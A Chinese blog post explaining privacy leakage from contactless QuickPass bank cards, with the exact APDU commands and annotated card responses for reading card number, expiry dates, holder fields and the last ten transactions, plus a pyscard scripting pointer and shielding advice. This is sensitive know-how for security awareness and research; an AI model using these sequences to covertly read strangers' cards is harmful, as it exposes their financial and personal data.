Blog

闪付卡(QuickPass)隐私泄露原理

2020-06-02 11:48:32 K1two2's Geek Hub 782

0×00 前言

说到闪付卡,首先要从EMV开始,EMV是由Europay,MasterCard和VISA制定的基于IC卡的支付标准规范。目前基于EMV卡的非接触式支付的实现有三个:VISA的payWave,MasterCard的PayPass以及银联的闪付QuickPass。目前从外观来看,银联发行的卡面有芯片的IC卡均支持闪付,部分银行支持VISA的payWave。

0×01 闪付卡隐私泄露风险

想象一下当路人拿着巴掌大的设备靠近你的时候,你身上的银行卡的卡号、发卡行、最近十笔的交易记录等,甚至是姓名、身份证号都泄露出去将会有多恐怖。通过这些信息攻击者就可以大致刻画出卡主人的消费习惯和生活水平等等。当然,这并不是闪付卡或金融IC卡的“漏洞”,这些信息是需要在交易过程中由POS机发送给发卡行进行验证的。

0×02 闪付卡工作流程

本文所指的工作流程只局限在跟信息泄露相关的流程上,不涉及数据认证、支付、联机交易等内容。

1
2
3
SELECT的命令报文格式为为00 A4 04(通过名称选择) 00(仅有一个) + 数据长度 + DATA的ASCII码
如选择qPBOC
00 A4 04 00 0E + 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 (2PAY.SYS.DDF01的ASCII码)

应用初始化

此处与交易有关,与本文隐私泄露关系不大,但因为是中间步骤,所以做简单描述。在上一步应用选择时卡片返回了PDOL(处理选项数据对象列表,可以理解为由卡片提供的组包格式),应用初始化时,按照PDOL组包向卡片发送GPO命令,包括金额、时间、国家代码、货币代码等。进入GPO就代表着交易的开始。

读取数据

此部分是我们主要关注的位置,通过GET DATA或READ RECORD命令来读取,READ RECORD通过SFI读取数据内容,主要关注的是读取个人化数据(DGI),GET DATA读取一些标签里的内容(如货币代码、金额限制、上限、交易日志格式等)。DGI的第一个字节为01-1E,是SFI,第二个字节是记录编号。常用的DGI有0101(2磁道等价数据、持卡人姓名(不建议存储)、1磁道自定义数据) 0102(2 磁道等价数据、1磁道自定义数据),0201(数据认证数据)等,具体的DGI表可参考《中国金融集成电路(IC)卡规范》的第十部分 表1。

1
2
3
4
5
6
7
8
9
10
11
12
APDU:00 A4 04 00 + 0E + 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 (2PAY.SYS.DDF01的ASCII)
响应包如下
6F 30 (FCI文件控制信息)
84 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 (DF专用文件,2PAY.SYS.DDF01的ASCII)
A5 1E (FCI专用模板)
BF 0C 1B (FCI自定义数据)
61 19 (目录入口)
4F 08 A0 00 00 03 33 01 01 01 (返回的AID,下一步选择的AID)
50 0A 50 42 4F 43 20 44 45 42 49 54 (应用标签,此处为PBOC DEBIT)
87 01 01(应用优先指示器)
90 00 (状态字:正常)

得到下一步的AID:A0 00 00 03 33 01 01 01,选择该AID

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
APDU:00 A4 04 00 + 08 + A0 00 00 03 33 01 01 01
响应包如下
6F 54 (FCI文件控制信息)
84 08 A0 00 00 03 33 01 01 01 (DF名称)
A5 48 (FCI专用模板)
50 0A 50 42 4F 43 20 44 45 42 49 54 (应用标签,此处为PBOC DEBIT)
87 01 01 (应用优先指示器)
9F 38 18 9F 66 04 9F 02 06 9F 03 06 9F 1A 02 95 05 5F 2A 02 9A 03 9C 01 9F 37 04 (PDOL)
5F 2D 02 7A 68 (首选语言,zh)
9F 11 01 01 (发卡行代码索引)
9F 12 0A 50 42 4F 43 20 44 45 42 49 54 (应用首选名称,PBOC DEBIT)
BF 0C 05 9F 4D 02 0B 0A (发卡行自定义数据,9F4D为交易日志入口标签)
90 00 (状态字)

接下来可以进行读取数据的部分了,首先读取DGI0201里存储的数据。其数据定义如下表:

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

要读取DGI0201,计算APDU如下,0000 0010 左移三位 得到 00010 加 100 得到 0001 0100 即 14(Hex)

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
APDU:00 B2 01 14 00
响应包如下
70 46 (模板)
5F 24 03 25 12 31 (25年12月31日失效日期)
5F 25 03 15 05 14 (15年05月14日生效日期)
5A 08 62 26 xx xx xx xx 45 00 (卡号)
9F 07 02 FF 00 (应用使用控制)
8E 0C 00 00 00 00 00 00 00 00 02 03 1F 00
9F 0D 05 D8 60 04 A8 00
9F 0E 05 00 10 98 00 00
9F 0F 05 D8 68 04 F8 00
5F 28 02 01 56 (0156中国)
90 00 (状态字:成功)

此处可以获取卡的生效日期、失效日期、卡号等内容,接下来尝试读取磁条2和持卡人信息的数据,需要读取DGI0101和DGI0102,,经过上述方法计算需要发送的APDU为:

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

1
2
3
4
5
6
7
8
APDU:00 B2 01 0C 00
响应包如下
70 15 (模板)
57 13 62 26 22 10 06 40 45 00 (2磁道卡号)
D2 51 2 (有效期 25/12)
2 20 00 98 78 32 00 00 0F (补足)
90 00 (状态字:成功)

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

1
2
3
4
5
6
7
8
APDU:00 B2 02 0C 00
响应包如下
70 36 (模板)
9F 61 12 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 (证件号,此处为空)
9F 62 01 05 (证件类型)
5F 20 1A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 (姓名ASCII,此处为空)
90 00 (状态字:成功)

接下来尝试读取一下交易记录,这里要注意首先要获取交易记录的格式,银联给出了推荐格式:

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

但是注意这里只是推荐格式,每个银行的卡片实现不一定相同,所以读取交易记录时应先获取交易记录的格式,使用GET DATA命令读取9F4F标签(交易日志格式),根据该格式结合READ RECORD读取出的交易日志解析。首先读取交易日志格式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
APDU:80 CA  9F4F  00
响应包如下
9F 4F 19
9A 03
9F 21 03
9F 02 06
9F 03 06
9F 1A 02
5F 2A 02
9F 4E 14
9C 01
9F 36 02
90 00

经过比对发现与推荐格式相同,之后可以通过READ RECORD命令读取从1-10读取交易日志。首先要找到在选择AID的时候的回包,9F4D指出了交易日志入口,通常为0B,根据上文计算其SFI为 0101 1100即5C。之后再构造APDU循环读取其十条交易记录

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

1
2
3
4
5
6
7
8
9
10
11
12
13
APDU:00 B2 01 5C 00:
响应包如下
17 09 13 (17年9月13号)
16 45 38 (16:45:38)
00 00 00 35 00 00 (3500.00元)
00 00 00 00 00 00 (其他金额)
01 56 (中国)
01 56 (人民币)
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0A (空)
21 (交易类型)
00 31 (应用交易计数器)
90 00 (状态字:成功)

下表为使用手里现有的银行卡的测试情况。

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

0×04 脚本

我们已经可以使用APDU发送的工具,获取想要获得的信息,剩下的工作就是脚本化。可以使用ACR122U的SDK,其提供了Delphi,Java,VB,C#,C++等语言,但个人更愿意通过Python来实现,通过使用Python的pyscard库,可以实现该功能。

明申智能卡/RFID 闪付卡(QuickPass)隐私泄露原理

0×05 防护方式

防护的措施可以考虑与读卡器保持足够的距离、使用铝箔包裹卡片、专业的Pacsafe下属的RFIDSafe系列或简单便捷的屏蔽卡套等措施。原理都是通过金属或液体屏蔽来屏蔽高频信号。


标签: 智能卡RFID
首页
产品
新闻
联系